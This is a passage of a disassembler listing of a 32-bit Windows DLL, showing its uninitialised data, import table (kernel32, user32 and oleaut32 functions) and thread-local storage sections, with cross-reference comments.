; sub_10001E2C+37�r ...
dword_1000706C dd 0 ; sub_10001EBC+33�o
dword_10007070 dd 0 dword_10007074 dd 0 dword_10007078 dd 0 dd 2 dup(0)
dword_10007084 dd 1 dd 10h, 2, 20h, 4, 40h, 4, 40h, 57h dup(0)
align 1000h
DATA ends
; Section 3. (virtual address 00008000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00006400
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 10008000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
dword_10008000 dd ? dword_10008004 dd ? ; sub_1000117C+16�r
dword_10008008 dd ? ; sub_10001584�w
dword_1000800C dd ? dword_10008010 dd ? ; sub_100015F0+A9�r
dword_10008014 dd ? dword_10008018 dd ? byte_1000801C db ? ; DATA XREF: sub_10001584+2E�w
align 10h
dword_10008020 dd 2 dup(?) word_10008028 dw ? ; DATA XREF: CODE:10001DB5�w
align 4
dd 72h dup(?)
word_100081F4 dw ? ; DATA XREF: CODE:10001DBE�w
align 4
dd 72h dup(?)
word_100083C0 dw ? ; DATA XREF: CODE:10001DC7�w
align 4
dd 71h dup(?)
dword_10008588 dd ? ; CODE:10001D98�w
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_100010A0+7�r
; sub_100010B4+D�r ...
dword_10008590 dd 2 dup(?) ; sub_100015C0+D�o ...
dword_10008598 dd ? ; sub_10001584+14�w
dword_1000859C dd ? ; sub_10001584+1B�w
dword_100085A0 dd ? dd 6 dup(?)
dword_100085BC dd ? ; sub_10001CC8+19�w
dd 2Ah dup(?)
byte_10008668 db ? ; DATA XREF: sub_10001E70�r
align 4
dword_1000866C dd ? ; sub_10001EBC+16�r ...
dword_10008670 dd ? ; CODE:10001F3C�w
dword_10008674 dd ? dword_10008678 dd ? ; CODE:10001F74�w
dword_1000867C dd ? ; CODE:10001FDC�w
dword_10008680 dd ? ; CODE:100021E0�w
dword_10008684 dd ? ; CODE:100022B0�w
dword_10008688 dd 7 dup(?) ; sub_100056E0+36A�o ...
dword_100086A4 dd ? ; sub_100056E0+2D9�w ...
dword_100086A8 dd ? ; sub_100056E0+313�w ...
dword_100086AC dd 42h dup(?) ; CODE:10005E4A�o
dword_100087B4 dd ? ; sub_100031E0+443�r ...
dword_100087B8 dd ? ; sub_100056E0+2A2�o
dword_100087BC dd ? dword_100087C0 dd ? dword_100087C4 dd ? dword_100087C8 dd ? align 10h
dword_100087D0 dd ? dword_100087D4 dd ? dword_100087D8 dd ? dword_100087DC dd ? ; sub_100056E0+2CF�r
; HMODULE hModule
hModule dd ? ; DATA XREF: sub_100025E0+3E�r
; sub_1000292C+90�r ...
dword_100087E4 dd ? ; sub_100038F0+62�w
dword_100087E8 dd ? ; sub_100038F0+42B�r ...
dword_100087EC dd ? ; sub_100038F0+3A7�r
dword_100087F0 dd ? ; sub_100038F0+5B5�r ...
dword_100087F4 dd ? ; CODE:10005D5B�r
dword_100087F8 dd ? ; sub_100025E0+7C�r ...
dword_100087FC dd ? ; sub_100031E0+347�r ...
dword_10008800 dd ? ; sub_100031E0+36D�r ...
dword_10008804 dd ? ; sub_100031E0+38B�r ...
dword_10008808 dd ? ; sub_100025E0+10F�r ...
dword_1000880C dd ? ; sub_100031E0+40E�r ...
dword_10008810 dd ? ; sub_100031E0+460�r ...
dword_10008814 dd ? ; sub_100025E0+EA�r ...
dword_10008818 dd ? ; sub_10004670+1FA�r ...
dword_1000881C dd ? ; sub_10004670+171�r ...
dword_10008820 dd ? ; sub_100038F0+32F�w ...
dword_10008824 dd ? ; sub_100048E0+F1�r ...
dword_10008828 dd ? ; sub_100048E0+1DD�r ...
dword_1000882C dd ? ; sub_100048E0+1AE�r ...
dword_10008830 dd ? ; sub_10004670+168�r ...
dword_10008834 dd ? ; CODE:10005D02�r ...
dword_10008838 dd ? ; sub_100038F0+437�w
dword_1000883C dd ? ; sub_100036EC+A8�r ...
dword_10008840 dd ? ; sub_100038F0+48F�w ...
dword_10008844 dd ? ; sub_1000567C+46�r ...
dword_10008848 dd ? ; sub_100038F0+5D2�r ...
dword_1000884C dd ? ; CODE:10005E04�r ...
dword_10008850 dd ? ; CODE:10005E1F�r
byte_10008854 db ? ; DATA XREF: CODE:loc_10005E15�o
; CODE:100067EA�r
byte_10008855 db 3 dup(?) ; DATA XREF: CODE:100067FD�o
; CODE:1000681F�o ...
dd 3Fh dup(?)
db ?
byte_10008955 db 3 dup(?) ; DATA XREF: CODE:1000678D�o
; CODE:100067B4�o
dd 3Fh dup(?)
db ?
byte_10008A55 db ? ; DATA XREF: CODE:10006A9F�r
; CODE:10006AC8�r ...
byte_10008A56 db ? ; DATA XREF: CODE:1000695C�r
; CODE:loc_100069CA�r
byte_10008A57 db ? ; DATA XREF: CODE:100061E4�r
; CODE:100061FE�r
byte_10008A58 db ? ; DATA XREF: CODE:loc_10006A96�r
byte_10008A59 db ? ; DATA XREF: CODE:loc_10005F0C�r
word_10008A5A dw ? ; DATA XREF: CODE:10005F43�o
dd 3Fh dup(?)
db 2 dup(?)
word_10008B5A dw ? ; DATA XREF: CODE:10005F6E�o
dd 4E3h dup(?)
dword_10009EE8 dd ? byte_10009EEC db ? ; DATA XREF: CODE:100060BF�r
byte_10009EED db 3 dup(?) ; DATA XREF: CODE:1000610B�o
; CODE:10006180�o
dd 3Fh dup(?)
db ?
byte_10009FED db 3 dup(?) ; DATA XREF: CODE:10006136�o
; CODE:100061AB�o
dd 4E2h dup(?)
dword_1000B378 dd ? ; CODE:10006101�r ...
dword_1000B37C dd ? ; CODE:10006171�r
byte_1000B380 db ? ; DATA XREF: CODE:10005ED5�r
; CODE:100060F3�r
byte_1000B381 db ? ; DATA XREF: CODE:10006218�r
word_1000B382 dw ? ; DATA XREF: CODE:10005EE1�o
dd 6 dup(?)
dword_1000B39C dd 40h dup(?) ; CODE:10005E60�o ...
byte_1000B49C db ? ; DATA XREF: CODE:10006278�r
; CODE:loc_10006B4F�r
align 10h
dd ?
dword_1000B4A4 dd ? ; CODE:1000624D�r ...
dword_1000B4A8 dd ? byte_1000B4AC db ? ; DATA XREF: CODE:10005ECC�r
; CODE:1000623B�r
byte_1000B4AD db ? ; DATA XREF: CODE:10005EC3�r
; CODE:loc_10006B6C�r
align 10h
dd ?
dword_1000B4B4 dd ? ; CODE:1000675A�r ...
dword_1000B4B8 dd ? ; CODE:loc_1000674C�r ...
dword_1000B4BC dd ? ; CODE:10006922�o ...
dword_1000B4C0 dd ? ; CODE:1000692E�r
dword_1000B4C4 dd ? ; CODE:10006917�r ...
dword_1000B4C8 dd ? ; CODE:100068A0�o ...
dword_1000B4CC dd ? ; CODE:10005EAE�r ...
dd 4 dup(?)
dword_1000B4E0 dd 4 dup(?) ; CODE:10006B61�o
byte_1000B4F0 db ? ; DATA XREF: CODE:loc_10006271�w
; CODE:10006B58�r
byte_1000B4F1 db ? ; DATA XREF: CODE:loc_10005EBC�w
; CODE:10005EFC�w ...
align 4
dword_1000B4F4 dd ? ; CODE:10006C0C�r
dword_1000B4F8 dd ? ; CODE:1000628A�r
dword_1000B4FC dd ? ; CODE:10006B66�r
align 1000h
BSS ends
;
; Imports from kernel32.dll
;
; Section 4. (virtual address 0000C000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00006400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetCurrentThreadId()
extrn __imp_GetCurrentThreadId:dword ; DATA XREF: GetCurrentThreadId�r
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn __imp_MultiByteToWideChar:dword ; DATA XREF: MultiByteToWideChar�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
extrn RtlUnwind:dword ; DATA XREF: CODE:loc_10001068�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; DATA XREF: CODE:loc_10001060�r
; void __stdcall GetSystemTime(LPSYSTEMTIME lpSystemTime)
extrn __imp_GetSystemTime:dword ; DATA XREF: GetSystemTime�r
; LPSTR __stdcall GetCommandLineA()
extrn __imp_GetCommandLineA:dword ; DATA XREF: GetCommandLineA�r
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
extrn __imp_TlsSetValue:dword ; DATA XREF: TlsSetValue�r
; LPVOID __stdcall TlsGetValue(DWORD dwTlsIndex)
extrn __imp_TlsGetValue:dword ; DATA XREF: TlsGetValue�r
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn __imp_LocalAlloc:dword ; DATA XREF: LocalAlloc�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword ; DATA XREF: GetModuleHandleA�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn __imp_FreeLibrary:dword ; DATA XREF: FreeLibrary�r
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn __imp_HeapFree:dword ; DATA XREF: HeapFree�r
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn __imp_HeapReAlloc:dword ; DATA XREF: HeapReAlloc�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn __imp_HeapAlloc:dword ; DATA XREF: HeapAlloc�r
; HANDLE __stdcall GetProcessHeap()
extrn __imp_GetProcessHeap:dword ; DATA XREF: GetProcessHeap�r
;
; Imports from user32.dll
;
; LPSTR __stdcall CharNextA(LPCSTR lpsz)
extrn __imp_CharNextA:dword ; DATA XREF: CharNextA�r
;
; Imports from oleaut32.dll
;
; void __stdcall SysFreeString(BSTR bstrString)
extrn __imp_SysFreeString:dword ; DATA XREF: SysFreeString�r
; BSTR __stdcall SysAllocStringLen(const OLECHAR *strIn, UINT ui)
extrn __imp_SysAllocStringLen:dword ; DATA XREF: SysAllocStringLen�r
;
; Imports from kernel32.dll
;
; int __stdcall lstrlenW(LPCWSTR lpString)
extrn __imp_lstrlenW:dword ; DATA XREF: lstrlenW�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn __imp_LoadLibraryA:dword ; DATA XREF: LoadLibraryA�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword ; DATA XREF: GetProcAddress�r
; HMODULE __stdcall GetModuleHandleA_0(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA_0:dword ; DATA XREF: GetModuleHandleA_0�r
; Section 5. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00006800
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 1000D000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd ? ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 3FFh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00006800
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 1000E000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 1000h
_rdata ends
end start